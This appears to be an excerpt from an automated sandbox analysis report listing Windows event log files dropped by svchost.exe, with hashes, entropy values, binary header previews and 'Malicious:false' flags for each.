                                                      Preview:ElfChnk.....................................0........Y0........................................................................................l...........................=...........................................................................................................................f...............?...........................m...................M...F.......................E................................M..&...g`..g5......................o]...........X...Z..GP...............s......od......_i..**..P............%.o..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.7590316238843728
                                                      Encrypted:false
                                                      SSDEEP:384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
                                                      MD5:B074238315662886E2BD70106D08A747
                                                      SHA1:5ADA158D19401565E76349FCA97489E9FB9BFA36
                                                      SHA-256:53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
                                                      SHA-512:9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
                                                      Malicious:false
                                                      Preview:ElfChnk.........................................0!....H.......................................................................j........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.7512622527805637
                                                      Encrypted:false
                                                      SSDEEP:1536:uXhhUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:uXPnS
                                                      MD5:674C1241792D48563659E74755F8160D
                                                      SHA1:D2F57D284BBE79688D21DC7B24407D107313E866
                                                      SHA-256:C7629EB835556F64E62C5A67AB71F0FAFCA49F99DB7A4DD86F67AE418CA9D287
                                                      SHA-512:06A16A1EAC164D12DA0EC8DD21A0B3E31D9481BC17A2BE7CD69D46EDDA4AFBC894AF399BC9AF9E23BDB4AA3D4DE5654B920C4A07FD8E0BF4B5013B722401CF0B
                                                      Malicious:false
                                                      Preview:ElfChnk.........%...............%............E..`G..zV......................................................................JB.Z................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................&B..........O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.3069197485541766
                                                      Encrypted:false
                                                      SSDEEP:768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
                                                      MD5:E6E4C860CE7DD1BB499D6A082B461B90
                                                      SHA1:11330861B23B1D29D777D9BD10619A07B6A6A9C0
                                                      SHA-256:C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
                                                      SHA-512:7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
                                                      Malicious:false
                                                      Preview:ElfChnk.........;...............;............r..@t...H......................................................................p"..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&........................................................................l..............]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):127536
                                                      Entropy (8bit):4.002504841511839
                                                      Encrypted:false
                                                      SSDEEP:768:ah0w+qLpBVi7CPME79nCxkSqAh0w+qLpBVi7CPME79nCxkSqlo:c0w+qtBVix0w+qtBViGo
                                                      MD5:F087536095F7D9207882B71BC985FCCB
                                                      SHA1:A481315760A02C8ABC1D7C237AAB9133A5FA0867
                                                      SHA-256:582AF5ACB55D782704EE34F77BD31C6383718BAEDD735F5DEA75D0B15613381E
                                                      SHA-512:C1111A2D4F0C63F86A9AD55F471DED337CB886F2EB5122B380762ABFE906DD7B560A2AE43D5F35D0E10ACBE52BDCF1AD169F4A8E44C6C802F25D1D74B71107DF
                                                      Malicious:false
                                                      Preview:ElfChnk.........#...............#........... ..............................................................................\.*f................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...'...............&.......................................................................................**.. ............#................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.2909571978750325
                                                      Encrypted:false
                                                      SSDEEP:384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
                                                      MD5:B0BF4D9EC91ABBDA5D328631B125A5C0
                                                      SHA1:E672D69127AE7C1A51046ADAA911871EC0C10ABB
                                                      SHA-256:8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
                                                      SHA-512:3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
                                                      Malicious:false
                                                      Preview:ElfChnk.U.......~.......U.......~....................}/.....................................................................@..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................v..................................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.488768580471203
                                                      Encrypted:false
                                                      SSDEEP:1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
                                                      MD5:E3FB1708C64D250E4D801AFB8688DF35
                                                      SHA1:8B889F0358683733257411E451A86E3A1D42159D
                                                      SHA-256:0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
                                                      SHA-512:2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
                                                      Malicious:false
                                                      Preview:ElfChnk.........$...............$.....................w.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................V...................................**................o...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):110280
                                                      Entropy (8bit):4.498129753183186
                                                      Encrypted:false
                                                      SSDEEP:3072:+cRFkL1TWX0gkB/J7oasEfyk2/vKlqk/PgTZSXwyvy8fJpfrAW+Cr6SXlUr20GpB:uNN
                                                      MD5:5C1CBA27D62D0FDEB339B82CEAEE22DF
                                                      SHA1:D0D220ADCE3ECBC912C8BF386CD3101C1167778F
                                                      SHA-256:B925AC34ACCDFB80EF53A918BCCFB6F78C39B513AC7E38CB46D1BBB19EAAC9D6
                                                      SHA-512:16DE86DA8774E70D1AFC2FD951735966454DF9DE9A666432A65A9FD7BDF50958A0EE2E5FA8F934B6650338DEC43A40FC75F084532E754EE3BC0FF2D8103A8431
                                                      Malicious:false
                                                      Preview:ElfChnk.>...............>......................`...98.......................................................................S.>................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................A...............&...i.......~......................**......>........Q.U..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:DIY-Thermocam raw data (Lepton 2.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, calibration: offset 0.000000, slope 0.001734
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.494601434214266
                                                      Encrypted:false
                                                      SSDEEP:384:ZhN7s7o787l7r787a7J7z7+7N17g7n767g7gY7hZ7D7k7F7r7wm7NP7Y7+7fa7lX:Z97uCg
                                                      MD5:4510D6B4D4F13962B3F66FA5828E5DFB
                                                      SHA1:CD282AAC16DAED1BA74B87D04B2C2A33F625AEC4
                                                      SHA-256:41B92AE9541B4F6BEE7163735327F3644C068E86E3150251F83591F6B56B8755
                                                      SHA-512:BE32258BCA2B476B3E178418356EC09BFF86B87D19A319C616B37BE28E4B992A503FD75C4114778F987B502453DAC4A2A1775D0C763E74A0BB8037BCF4FCAE13
                                                      Malicious:false
                                                      Preview:ElfChnk.Y.......g.......Y.......g............%...&..Pb......................................................................p...............................................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............................................................s.......................**......Y........................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.1499045494600955
                                                      Encrypted:false
                                                      SSDEEP:384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
                                                      MD5:2045FB0D54CA8F456B545859B9F9B0A8
                                                      SHA1:35854F87588C367DE32A3931E01BC71535E3F400
                                                      SHA-256:E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
                                                      SHA-512:013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
                                                      Malicious:false
                                                      Preview:ElfChnk.........;...............;...........xk...m...+.....................................................................F.~.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................6f..w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8164696340947971
                                                      Encrypted:false
                                                      SSDEEP:384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
                                                      MD5:1AB19FA472669F4334C7A9D44E94E1B3
                                                      SHA1:F71C16706CFA9930045C9A888FDB3EF46CACC5BC
                                                      SHA-256:549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
                                                      SHA-512:72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
                                                      Malicious:false
                                                      Preview:ElfChnk...................................... ..x$../..........................................................................<................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................!..................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9855903635327656
                                                      Encrypted:false
                                                      SSDEEP:384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
                                                      MD5:7BCA54AC75C7185ADFBB42B1A84F86E3
                                                      SHA1:AD91EE55A6F9F77AD871ACA9A5B59987CA679968
                                                      SHA-256:A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
                                                      SHA-512:79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................P+...,...0........................................................................9.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F...........................U.......................%%......&...................................................>...........................E.......**..............o.m...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.165454452307923
                                                      Encrypted:false
                                                      SSDEEP:384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
                                                      MD5:B6B6F199DA64422984403D7374F32528
                                                      SHA1:980D66401DFCCF96ADDDAF22334A5CE735554E7F
                                                      SHA-256:8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
                                                      SHA-512:5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
                                                      Malicious:false
                                                      Preview:ElfChnk.........'...............'...........P.......H:Z.....................................................................gO.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................f..................................**..............m.................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.8519554794255333
                                                      Encrypted:false
                                                      SSDEEP:384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
                                                      MD5:4140628CA3CEC29C0B506CEEBDF684F6
                                                      SHA1:A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
                                                      SHA-256:1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
                                                      SHA-512:779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
                                                      Malicious:false
                                                      Preview:ElfChnk.\...............\.......................0..../........................................................................v................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.1642919553794224
                                                      Encrypted:false
                                                      SSDEEP:384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
                                                      MD5:D7EECF043241FDB9486580582E208603
                                                      SHA1:045D5672A8E9884B78CD31C52D372375503CBF4F
                                                      SHA-256:6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
                                                      SHA-512:6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................02..h6...u'.....................................................................1..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................V2............................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):75320
                                                      Entropy (8bit):4.584741934833894
                                                      Encrypted:false
                                                      SSDEEP:768:ZOIZi8Ns5iLV8gRai8ZijiTEOmGkoeiDpbNQP:n+Jao7mce8pGP
                                                      MD5:E7AEFEC2DD127DC96ECB7999BF7D914A
                                                      SHA1:4D9EF3BDA86F074AB1C29D8D992DB7FDB549F5A7
                                                      SHA-256:93CDEEAFD2278C85738ADFBB4C79D2E19C088749FD249B242C56D93EF8C44653
                                                      SHA-512:C0E2D798045FA2FED7AFF072FC35886383A239354CC1C657D9AD4E576C163E21E57BA27E8E22FC29A1EE7A981A3BCC34EC89FF7F203ABFF020703F2DAC934486
                                                      Malicious:false
                                                      Preview:ElfChnk.........................................h ..E.G.......................................................................F.........................................4...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..0...........\f7...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 15, DIRTY
                                                      Category:dropped
                                                      Size (bytes):79016
                                                      Entropy (8bit):1.819103257557747
                                                      Encrypted:false
                                                      SSDEEP:384:yVhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUmEgUmHhL6UsE0ZK:CY7Lt+Y7Lt
                                                      MD5:9F8EEE9CE2531266167865A3B4C3F325
                                                      SHA1:1E2B096410C54918215754072990080AE7D6A897
                                                      SHA-256:E0EF1A0A537C1DD50ECC9DF87D52EC03022C2A42B7291A40B854C3AB8689D965
                                                      SHA-512:71AD58A81DB8483D70630FD8FFF2AB9F25E178AB74CEA4977F851C1924BFDFCCB340E789370F5E4AB454D979C406283454BB6DD80AC9BFCF90CA6B8B7E28D902
                                                      Malicious:false
                                                      Preview:ElfFile.....................................................................................................................\>.eElfChnk....................................../..(4...........................................................................z................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&..................................................................................../..................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.20418860310301978
                                                      Encrypted:false
                                                      SSDEEP:48:MKxW4LrP+MZQNRBEZWTENO4bpBkoXY/6FgVt:T/VKNVaO80oXY/6Fg
                                                      MD5:3E839D8CF1477668367C0DBC1980300F
                                                      SHA1:C16739D122678228116283ADB81FF343E1529153
                                                      SHA-256:684526EF64389582C8A0F9496FA79BF3523598C891C68F7FDDF6BC32B4E6A646
                                                      SHA-512:3ED69776FA934986595F0666D777AF7B72C19924D34871EACC9EABEF8F1CB732C2BD904858978CE3C2A0CFCA58F819CF3FFAC6FBDACE79722D470B0B1DB3B2B9
                                                      Malicious:false
                                                      Preview:ElfChnk............................................._.f......................................................................QD2................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**...............$2...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.6469884746870727
                                                      Encrypted:false
                                                      SSDEEP:384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
                                                      MD5:FC81D9FBA555C6BC7223594B8F6B46DE
                                                      SHA1:971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
                                                      SHA-256:9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
                                                      SHA-512:7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
                                                      Malicious:false
